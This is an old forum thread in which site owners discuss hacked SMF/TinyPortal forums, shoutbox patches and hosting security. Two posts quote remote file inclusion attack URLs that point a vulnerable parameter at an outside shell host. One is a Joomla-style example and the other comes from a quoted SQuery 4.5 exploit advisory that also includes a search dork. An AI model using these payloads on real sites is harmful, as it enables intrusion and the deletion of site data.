TinyPortal

For all of you that don't know http://gfxindia.com was hacked by someone....

Im just getting server not found from the link

Screenshot a saw - Bad Language warning..........................

(https://www.tinyportal.net/proxy.php?request=http%3A%2F%2Fimg148.imageshack.us%2Fimg148%2F433%2Fgfxoe3.th.png&hash=596fe8e9ca1f6695c4c1d6c2222b7efb1d4bf750) (http://img148.imageshack.us/my.php?image=gfxoe3.png)

Deadly red warning.  :smiley6600:

whats the reason why cause the site hacked ?

Cant say, but if he didnt updated with the security updates from here it could be in the ShoutBox.

But it looks diffrent, so it might be that the host it self got hacked and the sites on it
The redirect goes to http://www.starhack.org/

So does that mean we al who have shoutboxes installed should remove it ?
Isnt it a part of tini  portal ?

You can turn the shoutbox off and on from the TinyPortal/settings

But if you have installed the update pack you dont have to worrie about it.
Or if you have installed the rev2 version of TP, that have the latest security updates builded in already

I dont know which version I have installed.
ver .0.8.6.   is what is says. Where can I get the updated version ?

From the download section here at Tinyportal ;)

The package you installed, if you downloaded it from there with in the last two weeks you have the rev2 package, and taht is updated with the security patches needed.
But if you have an install older then that, go for the update pack here (http://www.tinyportal.net/smf/index.php?action=tpmod;dl=item111)
Simply upload the files in the package and replace the old ones.

Thanks g6, I think then I have updated patched mod. :)

I am not so sure this was the shoutbox exploit. It seems his index.php file was hacked..it doesn't redirect, it stays on the server.

Yes I think the same, it happened a lot lately with phpbboards, but there the index files were changed, in this case it seems simply overwritten.

I am hacked 3 or 4 times per weeks, same hackers, same problem: index.php content, is replaced by the hacker.

Version: SMF RC3 with TP 095.

Now, since 3 days, some guy "Guest (194.224.199.52) " from East Europe are attempt to doing some bad, i put a bann for this IP, and the trigger bann say that this banned have 800 hits.

it is the same people that did shoutbox explot because i had similar index when it was hacked through shoutbox.You have to replace index.php

So i am pretty sure it is the shoutbox

Now i quit the shoutbox for a time. If the attacks end ... well, i will very happy and shoutbox will be disabled for ever!.

http://www.rctxtremegamez.8m6.net/forum/index.php?topic=13.0

I'm going to host one, and just add replies with your reason and proof.

I hid my shoutbox from guests, might be a better solution than total disable.

Yes Marian, but if the Hacker register an acount?.

if u have installed the new version of TP (.95) then the shoutbox issue is already patched in that

if u still have the older version u can just upload the patch and its taken care of

dont have to disable shoutbox or anything :)

I got SMF RC3 with TP 095.

But for now i close my mouth. I am waiting with the shoutbox disabled. If in some days have not attacs, then it means that the problem is from ShoutBox. If the attacs still well ... i make suicide!

so ur safe and sound :up: as far as tp is concerned

hacking on ur site could be the result of weak server security and its probably a host issue

also just to let u know, banning by IP is effctive but also very harmful because if the person dosent have a static ip and uses a dynamic IP from their ISP then you could end up blocking all the users who belong to that IP range who may visit your site

Nearly all isp's use a single IP to identify their users and further ip mapping is done on their end in their server....so extrnally it shows one IP only

and if u ban it then its "bue bye everyone else" who may be a customer belonging to that IP range on that ISP

Change your FTP password. Also take a look at your other FTP accounts, if you have any.

First, this is not against TP, i love a lot TP. This is a call for help.


I know, i think that you have a lot of more experience that i. Then i tell you about:

The last two hacks in my site, the hacker put into my root folder directory, a file named: Admin.php, of 128 kbts and from this Admin.php, the hacker have deleted all my root site.  :-\

Know you some another case in another people that have this kind of problem with hack?

Know someone how this guy can put a php file into a root in a domain?.

The only way someone can place a php file in the root of your domain is:

A) They got either the server root password or your ssh/ftp userid & password and placed it there.

B) You had an unprotected php program (a filemanager for instance) that they got the userid/password for and used it to place it there.

In otherwords, it was either a server security issue or your own security issue.

There is one more possibility, though much less likely, that an employee of your host provider did it.

Ya, I strongly agree.

I don't see someone could just hack through TP/SMF to the point of deleting your whole root directory. The odds of that happening are next to nil.

Did you change your FTP password as I suggested?

yes, i have changed de password for FTP lot of times for passowrds likethis:

sample:

Rt5R4Eer54E4Te44tEe

But i have a questyon:

this bug (Jommla bug) is form other forum system, but in SMF can hacker doing some like this?:

http://www.victimsite.com/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1 &GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/pablin77/pa.html


Where http://www.freewebs.com/pablin77/pa.html is the hacker site, and hacker file (pa.html), with the hacker replace de contents of index.php from SMF o another file from SMF.

As Thurnok pointed out, someone must have access to be able to place files or change them. Of course if a hacker is going to redirect your site which file are they going to use? index.html or index.php because that is the default display file. You should really talk to your host about this so that maybe they can figure out how they're getting access.

SMF and TP protect against those kind of code executions by adding checks and sessions checks etc. So I don't see it possible with SMF and TP.

Are you running any other scripts on your site? Like a gallery or anything?

Have any one read through this thread ???
It seems to be a rather OLD thread with an OLD question ;)

Quote from: IchBinâ„¢ on October 03, 2006, 05:55:59 AM
Are you running any other scripts on your site? Like a gallery or anything?

Not IchBin, no one other script.

Thank you for you answer. I speaked a lot with the host provider, and he say that my php's files are the problem because all others users have not problems in the host, include him, that have you ouwner web site and never nobody can delete files.

I am only searching for a info, maybe this host provider lie about it, and my php's are not insecure, only i am searching a lot of info for can stop de hacks attacs. I love this system and cannot change it for another, i need stop hacks only.

change hosts seriously

ur host is probably not secure and they dont know it themselves

because if this was a problem with SMf or TP then u would see ALL our sites getting hacked left right and center until SMF and TP ceased to exist

akulion, you have right i think.

Squery 4.5, this is the Key.

Warning with this script for Query Game Servers.

any more details on that?

so we can prevent it happening to us as well

When most people hack site the use a shell script to get access to SMF,PHPBB,VBulletin, and MyBB other forum boards when finding a host you should always make sure your going to be secure on a good hosting server lots of hosting server say there secured when they really ain't they just want customer & the money if you have a hosting with a live support system ask the staff working on the live support system is your server secured if they yeah double check by finding security scripts on google.com the most unsecured hosting is free hosting companys

Quote from: GeofMauser on October 05, 2006, 07:41:11 PM
Squery 4.5, this is the Key.

Warning with this script for Query Game Servers.

I asked you if you were running other scripts and you said no?

Then what are you saying Squery for?

Quote from: akulion on October 05, 2006, 07:42:47 PM
any more details on that?

so we can prevent it happening to us as well

Squery, game server query script, version 4.5 or less have a high security xploit in folder Lib, and i various php files as "gore.php":

=================================================================
SQuery <= 4.5(libpath) Remote File Inclusion Exploit           
=================================================================
Worked On : ALL VERSIONS                                         |
                                                                 |
Critical Level : Dangerous                                       |
                                                                 |
Gug Found In : gore.php                                          |
=================================================================
Dork :  "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" | inurl:"modules.php?name=SQuery"

http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?
===============================================================================
Discoverd By : SHiKaA
Conatact : SHiKaA-[at]hotmail.com

GreetZ :  BlAcK_BiRd  Kambaa  NANA METO7575 Gendiaaa Saw SnIpEr_Sa Masry OSA FEGLA Kosho-Man 3amer and #ALL MEMBER OF EL SLAM-CITY
=================================================================

# milw0rm.com [2006-07-10]



PD:
And this was my problem, since i delete the Squery, the hackers stop to attak for now.

Quote from: IchBinÃ,â,,¢ on October 05, 2006, 07:58:31 PM

Quote from: GeofMauser on October 05, 2006, 07:41:11 PM
Squery 4.5, this is the Key.

Warning with this script for Query Game Servers.

I asked you if you were running other scripts and you said no?

Then what are you saying Squery for?

I forggot that Squery was in my site IchBin. Last night i was uploading a few folders in my domain, witouh SMF and TP installed, for can see if the hack way was in others points. Then, the hacker delete all my root direcotry again, and the Squey, was one of the folder "test" that i was uploading. Then, inmediatly i was going to search info in web, and instantly the google say a lot of links wiith sSQUERY SECURITY problem.

My "hacks" are not that sophiscated and often involve explotation of old or insecure scripts.

Most of us can avoid such attacks by keeping your scripts up to date, changing your username and passwords often. Basic security is the key in most cases.

A good host who knows how to secure and run server is also vital.

Quote from: GeofMauser on October 05, 2006, 10:18:57 PM

Quote from: IchBinÃ,â,,¢ on October 05, 2006, 07:58:31 PM

Quote from: GeofMauser on October 05, 2006, 07:41:11 PM
Squery 4.5, this is the Key.

Warning with this script for Query Game Servers.

I asked you if you were running other scripts and you said no?

Then what are you saying Squery for?

I forggot that Squery was in my site IchBin. Last night i was uploading a few folders in my domain, witouh SMF and TP installed, for can see if the hack way was in others points. Then, the hacker delete all my root direcotry again, and the Squey, was one of the folder "test" that i was uploading. Then, inmediatly i was going to search info in web, and instantly the google say a lot of links wiith sSQUERY SECURITY problem.

You should make sure you're email at the Squery site is up to date. They have released serveral fixes for security bugs in that script. They send out emails to everyone when it happens.

Quote from: IchBinÃ,â,,¢ on October 08, 2006, 06:07:33 PM

Quote from: GeofMauser on October 05, 2006, 10:18:57 PM

Quote from: IchBinÃ,â,,¢ on October 05, 2006, 07:58:31 PM

Quote from: GeofMauser on October 05, 2006, 07:41:11 PM
Squery 4.5, this is the Key.

Warning with this script for Query Game Servers.

I asked you if you were running other scripts and you said no?

Then what are you saying Squery for?

I forggot that Squery was in my site IchBin. Last night i was uploading a few folders in my domain, witouh SMF and TP installed, for can see if the hack way was in others points. Then, the hacker delete all my root direcotry again, and the Squey, was one of the folder "test" that i was uploading. Then, inmediatly i was going to search info in web, and instantly the google say a lot of links wiith sSQUERY SECURITY problem.

You should make sure you're email at the Squery site is up to date. They have released serveral fixes for security bugs in that script. They send out emails to everyone when it happens.

I have not received any email for warnings (specialy for a scrit buged that allow to destroy all data in domains), and my mail is Up for Squery Site. But one thing is secure, never more in my life i will be using this script.  End of the history.

Well I don't know why you didn't receive the emails, because I sure did. Maybe your email provider blocked it as spam or something.